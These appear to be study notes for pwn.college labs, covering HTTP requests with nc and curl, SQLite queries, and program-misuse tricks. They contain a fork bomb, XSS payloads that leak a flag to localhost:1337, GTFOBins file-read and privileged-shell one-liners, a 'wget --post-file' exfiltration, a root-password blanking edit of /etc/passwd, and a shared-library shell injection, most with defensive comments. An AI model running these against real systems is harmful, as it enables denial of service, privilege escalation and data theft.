PwnCollege - basic notes

1. Fork Bomb

A classic bash fork bomb that recursively calls itself to exhaust system resources.

# Fork bomb. The function pipes itself into itself, so every invocation
# starts two more; the process count doubles per generation until the
# process table, or the caller's process limit, is exhausted and nothing
# else can be spawned. The mitigation is a per-user process cap
# (`ulimit -u` in the login shell, or a cgroup pids.max for the session),
# which makes the bomb fail at the limit instead of taking the host down.
myfunc () {
myfunc | myfunc
}
myfunc

2. Web Security

2.1 Basic Requests

Using netcat and curl to perform simple GET requests.

# Manual GET request via nc: raw HTTP/1.1 on the wire. Host is mandatory
# in HTTP/1.1, and "Connection: close" asks the server to end the exchange
# after one response, so nc returns instead of waiting on a kept-alive
# socket. printf is used because it emits the \r\n escapes literally.
printf "GET / HTTP/1.1\r\nHost: localhost\r\nConnection: close\r\n\r\n" | nc localhost 80

# Simple GET via curl (-X GET is curl's default method; it is redundant
# here and only matters when combined with -d, which would otherwise POST)
curl -X GET "http://localhost/"

2.2 Custom Headers

Setting the Host header for different tasks.

# The Host header is what a shared server uses to choose the virtual host.
# It is entirely client-controlled, which is why server-side routing, link
# generation and password-reset URLs must validate it against a fixed list
# of expected names rather than echo it back.
# Task: Host: root-me.org
curl -X GET http://localhost/task -H "Host: root-me.org"

# Task: Host: net-force.nl:80 (-v prints the request and response headers,
# which confirms the header went out exactly as given, port suffix included)
curl -v -X GET http://localhost/gate -H "Host: net-force.nl:80"
# Same request hand-built for nc; the ":80" is part of the header value
printf "GET /gate HTTP/1.1\r\nHost: net-force.nl:80\r\nConnection: close\r\n\r\n" | nc localhost 80

2.3 URL Encoding & Query Parameters

Handling URL-encoded spaces in the path, and multiple query-string parameters.

# URL Encoded Path: /progress%20request%20qualify
# The request text is passed as an argument to printf's "%b" rather than as
# the format string: a raw "%20" in the format would be parsed as a printf
# conversion, while "%b" expands the \r\n escapes and leaves the percent
# signs in the argument untouched.
printf "%b" "GET /progress%20request%20qualify HTTP/1.1\r\nHost: challenge.localhost:80\r\nConnection: close\r\n\r\n" | nc localhost 80

# Query Strings: parameters travel after "?", separated by "&". Anything in
# the query string ends up in server access logs and proxy logs, which is
# why secrets such as tokens belong in a header or body, not here.
printf "%b" "GET /mission?hash=crwtzkzq HTTP/1.1\r\nHost: challenge.localhost:80\r\nConnection: close\r\n\r\n" | nc localhost 80
printf "%b" "GET /request?access=ejnskvxx&token=rmxwpdzo&signature=fhhmtasz HTTP/1.1\r\nHost: challenge.localhost:80\r\nConnection: close\r\n\r\n" | nc localhost 80
# curl form of the same idea; the URL is quoted so the shell does not treat
# "&" as a background operator
curl -X GET "http://localhost/hack?pass=fjawumxb&security_token=yaanpzkj&security=xufooqmp" -H "Host: challenge.localhost:80"

2.4 POST Requests

Submitting form data with the application/x-www-form-urlencoded content type.

# Manual POST via nc. Content-Length must equal the byte count of the body
# after the blank line ("challenge_key=ocgzmivl" is 22 bytes); a wrong value
# makes the server wait for more data or truncate the body, and mismatched
# lengths between a proxy and its backend are the root of request smuggling.
printf "%b" "POST /complete HTTP/1.1\r\nHost: challenge.localhost:80\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 22\r\nConnection: close\r\n\r\nchallenge_key=ocgzmivl" | nc localhost 80

# POST via curl. -d already implies POST and sets the form content type and
# Content-Length, so -X POST is redundant here.
curl -X POST "http://localhost/hack" -H "Host: challenge.localhost:80" -d "token=ieovmiim&authcode=dhcrcdvp&access=cbmupwsi"

# Complex POST via nc: four fields joined by "&"; the body is 74 bytes and
# the header says so
printf "%b" "POST /verify HTTP/1.1\r\nHost: challenge.localhost:80\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 74\r\nConnection: close\r\n\r\nsecure_key=rxwoveec&security=yyiezfbi&pass=oufnsrdp&challenge_key=menvugmn" | nc localhost 80

2.5 Cookies & State Management

Persisting and replaying session cookies.

# Save and send cookies with curl: -c writes the cookie jar after the
# exchange, -b reads it before, -L keeps the jar across redirects. The jar
# is a plain-text file in the current directory holding live session
# tokens, so treat it as a credential (restrictive mode, never committed).
curl -c cookies.txt -b cookies.txt -L http://localhost/

# Manual Cookie Header: whoever presents this value *is* the session, which
# is the reason for Secure/HttpOnly/SameSite attributes and short lifetimes
# on session cookies.
printf "%b" "GET / HTTP/1.1\r\nHost: localhost\r\nCookie: cookie=6136b40d5c4af043f373b9f786ce3d30\r\nConnection: close\r\n\r\n" | nc localhost 80

2.6 Redirects

Following HTTP 302 redirects.

# Manual handling (checking Location header): nc shows the 302 itself, so
# the Location value can be read before deciding whether to follow it.
printf "%b" "GET / HTTP/1.1\r\nHost: challenge.localhost:80\r\nConnection: close\r\n\r\n" | nc localhost 80

# Automated redirect following with -L. NOTE(review): curl re-sends custom
# headers such as this Host override on every hop of the redirect chain, so
# check where Location points before following when the target is not
# under your control.
curl -L -X GET "http://localhost/" -H "Host: challenge.localhost:80"

2.7 Client-Side Redirection & XSS-style Exfiltration

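# These lines are shell commands, so comments use "#": the original "//"
# markers are executed by the shell and fail with "Is a directory". Each
# command overwrites solve.html in the web root with a page whose script
# runs in the visiting browser.

# Simple JS redirect: the visiting browser is sent to /check
echo '<script>window.location = "/check";</script>' > ~/public_html/solve.html

# Data exfiltration via URL. /submit is loaded as a script and is assumed to
# define a global named `flag`; the page then navigates to port 1337 with
# that value in the query string. Defender view: secrets must not be exposed
# as script-readable globals, a Content-Security-Policy script-src limits
# where scripts may load from, and the leaked value lands in the listener's
# access log, so unusual query parameters in logs are a detection signal.
echo '<script src="/submit"></script><script>window.location="http://localhost:1337/?stolen="+flag;</script>' > ~/public_html/solve.html

# Exfiltration using fetch: reads the body of /gateway from the same origin,
# so the browser attaches the victim's cookies automatically, then leaks it
# the same way. The same-origin policy is what grants the injected script
# this read, so preventing the injection (output encoding, CSP) is the root
# mitigation; connect-src in CSP limits where fetch may reach.
echo '<script>fetch("/gateway").then(r=>r.text()).then(d=>window.location="http://localhost:1337/?stolen="+d);</script>' > ~/public_html/solve.html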

3. Program Misuse (GTFOBins)

Techniques for reading files the caller cannot open directly (such as /flag) by way of unintended behavior in other programs.

# Program misuse catalogue. Every line reads or executes through a helper
# program instead of opening /flag directly, and only works when that
# program runs with more privilege than the caller (a SUID/SGID bit, a file
# capability, or a sudo rule). The defender's reading of the list is the
# inverse: grant no privilege bit to a tool that can read arbitrary files or
# spawn a shell, keep sudo rules argument-scoped, and alert on privileged
# executions whose arguments name sensitive paths.

# Compressed formats: compress to stdout, then decompress straight back
gzip -c /flag | gzip -d
bzip2 -c /flag | bzip2 -d
# NOTE(review): for zip, -c means "add entry comments" and -d "delete
# entries", not compress/decompress as in the two lines above; confirm this
# line actually echoes the file before keeping it in the notes.
zip -c /flag | zip -d
# tar: single-file archive to stdout, extracted back to stdout
tar -cO /flag | tar -xO

# Archive tools: the archive is only a vehicle; the content comes back out
ar r pwned.a /flag && ar p pwned.a
# cpio -o copies the named file into an archive written to stdout
echo /flag | cpio -o

# Shell/Execution wrappers: each wrapper merely execs sh. With bash as
# /bin/sh, "-p" keeps the inherited effective uid instead of dropping it,
# which is the whole point when the wrapper itself is SUID.
env /bin/sh -p
nice /bin/sh -p
timeout 0 /bin/sh -p
setarch $(arch) /bin/sh -p
# socat attaches a pty so the spawned shell is fully interactive
socat - 'exec:/bin/sh -p,pty,ctty,raw,echo=0'

# Text processing / viewing: tools whose ordinary job is to read a file
find /flag -exec cat {} \;
mawk '//' /flag
sed '' /flag
whiptail --textbox --scrolltext /flag 50 100
ed /flag # Use ',p' to print, 'q' to quit

# Language interpreters: a privileged interpreter is a privileged shell
perl -ne print /flag
python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
ruby -e 'puts File.read("/flag")'

# Miscellaneous: tools that take a file as input and, in most of these
# cases, echo its content in their output or diagnostics
date -f /flag
dmesg -rF /flag
wc --files0-from /flag
gcc -x c -E /flag
as @/flag

# Network tools: the file is POSTed to a local listener. Outside the sandbox
# this is the exact shape of exfiltration; egress filtering and alerting on
# wget/curl POSTs from unexpected users is the detection angle.
nc -lp 1337 & wget --post-file=/flag http://127.0.0.1:1337/

3.1 Privilege Escalation Tricks

# Changing permissions/ownership: only meaningful when chown/chmod themselves
# run privileged; the result is a world-writable (777) sensitive file.
# File-integrity monitoring on owner/mode changes of such files catches it.
chown $(id -un):$(id -gn) /flag
chmod 777 /flag

# Shadowing root password: removing the "x" from root's passwd entry drops
# the pointer to /etc/shadow, so su asks for no password. The copy-edit-move
# sequence needs write access to /etc/passwd, or to /etc for the mv, which
# an unprivileged user should never hold. Detection: an auditd watch on
# /etc/passwd, and a check for entries whose password field is empty.
cp /etc/passwd ./hack_passwd
sed -i 's/^root:x:/root::/' ./hack_passwd
mv ./hack_passwd /etc/passwd
su root

# Shared Library Injection: ssh-keygen -D loads the given path as a PKCS#11
# provider, and a library constructor runs at load time before any provider
# function is called; the empty C_GetFunctionList is the symbol such a
# module is expected to export. The -D argument is therefore untrusted input
# to whatever privilege ssh-keygen runs with (here presumably a privileged
# copy under /challenge/); no SUID or unrestricted sudo ssh-keygen should
# exist. gcc reads the C source from stdin ("-x c -").
echo '#include <unistd.h>
void C_GetFunctionList() {}
void __attribute__((constructor)) init() {
execl("/bin/sh", "sh", "-p", NULL);
}' | gcc -w -fPIC -shared -o lib.so -x c -
/challenge/ssh-keygen -D ./lib.so

4. SQL Injection Basics

4.1 Simple Selects

-- Dump every row of the logs table. No projection list is given because the
-- schema is not known here; in production code name the columns instead.
SELECT *
FROM logs;

-- Exact-match filters on the tag column.
SELECT *
FROM entries
WHERE flag_tag = 1337;

-- <> is the ANSI spelling of != and behaves identically. Rows whose
-- flag_tag is NULL are excluded by either form (the comparison is UNKNOWN).
SELECT resource
FROM flags
WHERE flag_tag <> 1;

4.2 Pattern Matching & String Manipulation

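-- LIKE operator. With no % or _ wildcard this is an equality test (in
-- SQLite LIKE is also case-insensitive for ASCII). The literal is in single
-- quotes: double quotes delimit identifiers in SQL, and SQLite only accepts
-- "yep" as a string through a legacy fallback that builds with SQLITE_DQS=0
-- reject, so the original "yep" fails or changes meaning elsewhere.
SELECT detail FROM payloads WHERE flag_tag LIKE 'yep';

-- Substring matching: keeps rows whose detail starts with 'pwn'. Wrapping
-- the column in substr() prevents an index on detail from being used.
SELECT detail FROM items WHERE substr(detail, 1, 3) = 'pwn';

-- Character-window extraction: two five-character slices of secret. The
-- second slice is empty when secret is shorter than six characters. Seen
-- from the application side, a query like this succeeding from user input
-- is the signature of a blind/boolean SQL injection probe, which is the
-- reason to parameterize queries and never surface secrets to the query.
SELECT substr(secret, 1, 5), substr(secret, 6, 5) FROM items;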

4.3 Database Schema Exploration

-- Enumerate user tables: sqlite_master is SQLite's schema catalogue with one
-- row per table, index, view and trigger; the type filter keeps tables only.
-- When query results or errors from an injectable endpoint reach the client,
-- this single statement reveals the whole schema.
SELECT name
FROM sqlite_master
WHERE type = 'table';

-- Read the table found above (name taken from the previous result).
SELECT flag
FROM UgRKNxaq;